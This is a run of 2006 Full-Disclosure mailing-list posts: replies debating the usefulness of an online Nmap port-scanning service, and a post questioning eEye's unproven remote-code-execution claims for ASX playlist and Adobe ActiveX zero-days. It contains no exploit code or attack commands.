: Barracuda Networks acknowledged the problem. 2006-11-29 : Barracuda Networks published a fix. 2006-12-05 : Advisory is disclosed to the public. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nmap Online
On Wed, 6 Dec 2006, Greg wrote: I don't wish to upset anyone but that answer has to be the craziest FIRST port of call approach I have seen used. I get plenty of those sorts of calls. I take about 30 seconds time on the phone for almost all of them. I say Pull the power plug out of the router. Wait 10 seconds, plug it back in and wait another 10 seconds. OK, try now and almost all of them report it works well. That is heavily target market specific... Whilst I offer the same line to some friends and family, others I wouldn't dare start there (out of respect - they've already done everything obvious before asking for help). Besides, wouldn't it be just as easy to use the Nmap sitting on my computer if I decided I needed to use it? If only it was always that easy... I just moved, and whilst the ISP is the same, the CLEC is new - new lines, new IP, some newer softare, etc. I need to verify *my* setup, so: * my local nmap is useless * my work boxen are heavily firewalled - even outbound * my accounts elsewhere usually don't have nmap available to non-admins (and I shy from that role unless needed). So... For me, this has been an great service, and I'm sure I'm not alone. -- Rick Nelson Life'll kill ya -- Warren Zevon Then you'll be dead -- Life'll kill ya ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nmap Online
On 12/5/06, Greg [EMAIL PROTECTED] wrote: I don't wish to upset anyone but that answer has to be the craziest FIRST port of call approach I have seen used. I get plenty of those sorts of Who said it was the first thing that was tried? And you just can't pull the plug on a router in a production shop. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eEye's Zero-Day Tracker Launch
http://eeyeresearch.typepad.com/blog/ http://research.eeye.com/html/alerts/zeroday/index.html If something is reported as a non-exploitable bug, we'll make sure to exhaust the flaw for exploitability, as we have shown with the ASX Playlist and the ADODB.Connection ActiveX zero-day vulnerabilities. Or.. FUD? 1.) Adobe ActiveX http://research.eeye.com/html/alerts/zeroday/20061128.html Although there was no supplied proof of concept for these vulnerabilities, releasing the method names as well as the fact that they are 'memory corruption' errors and 'could be exploited by attackers to take complete control of an affected system' without a vendor-supplied patch will put many Adobe users at risk. And.. Remote Code Execution: Yes Now wait a second, I thought that you guys were going to make sure to exhaust the flaw for exploitability? Did you actually try this out that you can say Remote Code Execution is possible? 2.) ASX Playlist http://research.eeye.com/html/alerts/zeroday/20061122.html Now this is fun. Severity: High Remote Code Execution: Yes As a result, a two- or four-byte heap overflow is possible if the REF HREF URL features a protocol shorter than three characters (the length of mms). Ok. But wait, what's this sentence doing here: Exploitability due to the corruption of the adjacent heap block's header has not yet been demonstrated but is assumed likely. So... you ASSUMED that it is likely, even though you can only have up to a 4-byte overwrite which does not overwrite the needed pointers in order to actually exploit this, yet you say Yes in Remote Code Execution? trippin-out, noodles for long life! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/